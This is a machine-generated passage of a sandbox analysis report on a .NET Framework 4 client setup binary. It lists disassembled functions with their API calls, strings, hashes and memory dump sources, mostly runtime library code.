                                                                                                                                                                    • Instruction ID: 5833e7f83ea730600eda8931ddba21408830c886f8adf29557c191f133170e75
                                                                                                                                                                    • Opcode Fuzzy Hash: e7443f604918be9ce172fad79b4f2d8c23543c96c6dd21b3ad97b61ac9784b7a
                                                                                                                                                                    • Instruction Fuzzy Hash: BF219C72901214BFDB225BA1DD49DEF7FACEF45B60B208425F504D6150DA388BC097A0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002A61C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00036E90,00000008,0002A729,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C), ref: 0002A62D
                                                                                                                                                                    • __lock.LIBCMT ref: 0002A661
                                                                                                                                                                      • Part of subcall function 0002D1BD: __mtinitlocknum.LIBCMT ref: 0002D1D3
                                                                                                                                                                      • Part of subcall function 0002D1BD: __amsg_exit.LIBCMT ref: 0002D1DF
                                                                                                                                                                      • Part of subcall function 0002D1BD: EnterCriticalSection.KERNEL32(?,?,?,0002A803,0000000D,00036EB8,00000008,000337A4,?,00000000), ref: 0002D1E7
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(0003A448), ref: 0002A66E
                                                                                                                                                                    • __lock.LIBCMT ref: 0002A682
                                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 0002A6A0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                    • String ID: KERNEL32.DLL
                                                                                                                                                                    • API String ID: 637971194-2576044830
                                                                                                                                                                    • Opcode ID: a64f7f1be9d9e48625e13908ecf5ea0a93acdbf3575bd0902a6773ffc5318f04
                                                                                                                                                                    • Instruction ID: f1b31a0b04737b9986e2aa5a3612000348fbc5e1476522c34d757134e958f556
                                                                                                                                                                    • Opcode Fuzzy Hash: a64f7f1be9d9e48625e13908ecf5ea0a93acdbf3575bd0902a6773ffc5318f04
                                                                                                                                                                    • Instruction Fuzzy Hash: 13018471540710EFE721EF65E80A789FBE0AF01324F10890EE5E6967A2CBB4A644CF16
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00034FC1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 00034FE2
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 00034FF3
                                                                                                                                                                    • __getptd.LIBCMT ref: 00035001
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                    • API String ID: 803148776-2671469338
                                                                                                                                                                    • Opcode ID: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                                                                                                                                    • Instruction ID: 876a0e0a837a36fc52ea599c7e9cb54b04f97517c024f71da57b12c4e805a13f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                                                                                                                                    • Instruction Fuzzy Hash: CCE04F316041148FC764AB68D44ABAC33E8FF89315F5944F1E80CCB233CB38E8548987
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00035296 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CreateFrameInfo.LIBCMT ref: 000352BE
                                                                                                                                                                      • Part of subcall function 00034CDB: __getptd.LIBCMT ref: 00034CE9
                                                                                                                                                                      • Part of subcall function 00034CDB: __getptd.LIBCMT ref: 00034CF7
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352C8
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352D6
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352E4
                                                                                                                                                                    • __getptd.LIBCMT ref: 000352EF
                                                                                                                                                                    • _CallCatchBlock2.LIBCMT ref: 00035315
                                                                                                                                                                      • Part of subcall function 00034D8F: __CallSettingFrame@12.LIBCMT ref: 00034DDB
                                                                                                                                                                      • Part of subcall function 000353BC: __getptd.LIBCMT ref: 000353CB
                                                                                                                                                                      • Part of subcall function 000353BC: __getptd.LIBCMT ref: 000353D9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1602911419-0
                                                                                                                                                                    • Opcode ID: f1249dbd8b9773a74c5238900f28c80350d2e397f6e65c02be4a40f77a5aad32
                                                                                                                                                                    • Instruction ID: fbf01277cdfbc7b620c422e30d270446810b6a73b36a76f413e62947306a2132
                                                                                                                                                                    • Opcode Fuzzy Hash: f1249dbd8b9773a74c5238900f28c80350d2e397f6e65c02be4a40f77a5aad32
                                                                                                                                                                    • Instruction Fuzzy Hash: 681119B5D04209DFDB01EFA4D846BED7BB4FF04310F1080A9F814AB262DB789A119F55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002C589 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 0002C595
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0002C5B5
                                                                                                                                                                    • __lock.LIBCMT ref: 0002C5C5
                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0002C5E2
                                                                                                                                                                    • _free.LIBCMT ref: 0002C5F5
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(023D1660), ref: 0002C60D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                    • Opcode ID: ad654df8b2e27b930b59f086824d0a31aaa96ae22954681820ccae5b06df2421
                                                                                                                                                                    • Instruction ID: 2e8248cc7a529d1ac61e937231729be7a6847361d839891fe8960898ab988447
                                                                                                                                                                    • Opcode Fuzzy Hash: ad654df8b2e27b930b59f086824d0a31aaa96ae22954681820ccae5b06df2421
                                                                                                                                                                    • Instruction Fuzzy Hash: A801A132A04F31EBEB66AB24B405BDD77E4AF02710F144106E84467692CB68E982CBD6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A9AE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,?,?,0001A8F1), ref: 0001A9EE
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000024,?,00000000,00000000,80000000,00000007,00000003,00000080,00000000,00000000,00000000), ref: 0001AA2C
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0001A8F1,?,00000000,00000004,?,00000000,?), ref: 0001AA36
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0001AAED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 3160720760-3993045852
                                                                                                                                                                    • Opcode ID: e7b1ee955a4a1446bf12fb29af92055bfc4fbc183603357288c44c299b102206
                                                                                                                                                                    • Instruction ID: 3463be055af0b841db95c521b84813d7bcafd10dd72cb121c57f7ffe4fd83d2c
                                                                                                                                                                    • Opcode Fuzzy Hash: e7b1ee955a4a1446bf12fb29af92055bfc4fbc183603357288c44c299b102206
                                                                                                                                                                    • Instruction Fuzzy Hash: 41416F71E012099FCB61CF69DA44AEDB7F4AF4A320F648619E521E7180D37499C4CF67
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019C21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,X?f,?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C43
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C53
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C64
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016488,00000000,00000000,74DF23A0,?,00015BF4), ref: 00019C6E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$DeleteMove
                                                                                                                                                                    • String ID: X?f
                                                                                                                                                                    • API String ID: 4226254011-1642154059
                                                                                                                                                                    • Opcode ID: 59c20dc46610c26b90622eec582ea669c4df1826f80ad8c06f3e33b65ee347be
                                                                                                                                                                    • Instruction ID: d48fbad744b5ddce9b24ecd45a8690c1c5d6b5e6d002160277d35a00759a7917
                                                                                                                                                                    • Opcode Fuzzy Hash: 59c20dc46610c26b90622eec582ea669c4df1826f80ad8c06f3e33b65ee347be
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01443760020567E7215769CD65BDABAEE8FC0364F260034EB05E7101EA38DD8182E8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00035652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 00035665
                                                                                                                                                                      • Part of subcall function 000355BB: ___BuildCatchObjectHelper.LIBCMT ref: 000355F1
                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0003567C
                                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 0003568A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                    • API String ID: 2163707966-3733052814
                                                                                                                                                                    • Opcode ID: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                                                                                                                                    • Instruction ID: 68bed504c62b263a2ab178fc223dbc9bde69de53cd0dbc099b9a4ece21f19d69
                                                                                                                                                                    • Opcode Fuzzy Hash: e371cabbb856675a566eb448d13e963a276105ceaaefeb0375b179d063171748
                                                                                                                                                                    • Instruction Fuzzy Hash: B301E475001909BBDF136E51CC46EEB7FAAEF08355F444010BD182A172DB32A9B1EBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0003168A Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 00031698
                                                                                                                                                                      • Part of subcall function 0002CDB5: __FF_MSGBANNER.LIBCMT ref: 0002CDCE
                                                                                                                                                                      • Part of subcall function 0002CDB5: __NMSG_WRITE.LIBCMT ref: 0002CDD5
                                                                                                                                                                      • Part of subcall function 0002CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002CDFA
                                                                                                                                                                    • _free.LIBCMT ref: 000316AB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                                    • Opcode ID: c94ba1a20612b90b34910cfe62c656025c568cb80e3786da818bb544496d0e61
                                                                                                                                                                    • Instruction ID: d156ae9ba0fb7c6cdded33fdb3971215706d9c82e78c998c36b3f8f91a7fc361
                                                                                                                                                                    • Opcode Fuzzy Hash: c94ba1a20612b90b34910cfe62c656025c568cb80e3786da818bb544496d0e61
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A11CD32809624ABDB372BB5BC067DE37ACAF4C3A1F298526F95CDB152DB348C405794
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002CD37 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 0002CD43
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 0002CD5A
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0002CD68
                                                                                                                                                                    • __lock.LIBCMT ref: 0002CD78
                                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0002CD8C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                                    • Opcode ID: fb64305dd2c3803fb9e59a80f22fb2dbe75fcad9177ba7f5f5cd8fc8a5b80a15
                                                                                                                                                                    • Instruction ID: 48990b7036bc54831e1fd579a64e6bb3c2f9f0624ca9b800883ef08d502f44b3
                                                                                                                                                                    • Opcode Fuzzy Hash: fb64305dd2c3803fb9e59a80f22fb2dbe75fcad9177ba7f5f5cd8fc8a5b80a15
                                                                                                                                                                    • Instruction Fuzzy Hash: 21F09032A087309BF662BB64B803F9D77A06F02720F25815AF455AA1D3CF645901DA9B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00033734 Relevance: 7.5, APIs: 5, Instructions: 29threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00029A87: _doexit.LIBCMT ref: 00029A93
                                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0003374B
                                                                                                                                                                      • Part of subcall function 0002A57F: TlsGetValue.KERNEL32(?,00033750), ref: 0002A588
                                                                                                                                                                      • Part of subcall function 0002A57F: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,00033750), ref: 0002A59A
                                                                                                                                                                      • Part of subcall function 0002A57F: TlsSetValue.KERNEL32(00000000,?,00033750), ref: 0002A5A9
                                                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 00033756
                                                                                                                                                                      • Part of subcall function 0002A555: TlsGetValue.KERNEL32(?,?,0003375B,00000000), ref: 0002A563
                                                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 00033769
                                                                                                                                                                      • Part of subcall function 0002A5B8: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,?,?,0003376E,00000000,?,00000000), ref: 0002A5C9
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00033772
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00033779
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0003377F
                                                                                                                                                                    • __freefls@4.LIBCMT ref: 0003379F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1443443662-0
                                                                                                                                                                    • Opcode ID: 04c00dbb0a667938901ba17c4549cafe12ecd3cc649de2d2829449b712a7e15f
                                                                                                                                                                    • Instruction ID: 6e84cb337f3ed33f2c6bef4932b6f8e95d8fff52022facc2a71db40d10a4e8a2
                                                                                                                                                                    • Opcode Fuzzy Hash: 04c00dbb0a667938901ba17c4549cafe12ecd3cc649de2d2829449b712a7e15f
                                                                                                                                                                    • Instruction Fuzzy Hash: E3E08CB5E00B75AB8F1237F1BD0A8DF7A6C9F06314F004400BA20A3003EE2C9A0186E3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00015CDA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019166: LoadStringW.USER32(?,?,00000000,00000040), ref: 00019189
                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00000010), ref: 00015DC5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get error string from error: 0x%x, xrefs: 00015D48
                                                                                                                                                                    • Failed to get error message for error: 0x%x., xrefs: 00015D91
                                                                                                                                                                    • Failed to concatenate message with error string., xrefs: 00015D6B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LoadMessageString
                                                                                                                                                                    • String ID: Failed to concatenate message with error string.$Failed to get error message for error: 0x%x.$Failed to get error string from error: 0x%x
                                                                                                                                                                    • API String ID: 2284331267-3986587811
                                                                                                                                                                    • Opcode ID: 70953caf9e2947ecd3f8dc5baa7d878d8885560d2b79c0ee9cc96a9cb2142f3c
                                                                                                                                                                    • Instruction ID: 42fec8e11c9ed45256ba55cf385d402e81284aaf0807181beae6e54d4bf666d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 70953caf9e2947ecd3f8dc5baa7d878d8885560d2b79c0ee9cc96a9cb2142f3c
                                                                                                                                                                    • Instruction Fuzzy Hash: 5A318631D40A05FADF31A794AC4AEDDB7B99B90715F208526F501BA062EB754BC0A741
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001E3CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0001E3D2
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,0000005F,00000000,00000010,0001E493,00000000,?,00000000,00000000), ref: 0001E43B
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0001E460
                                                                                                                                                                      • Part of subcall function 0001C523: __CxxThrowException@8.LIBCMT ref: 0001C58A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
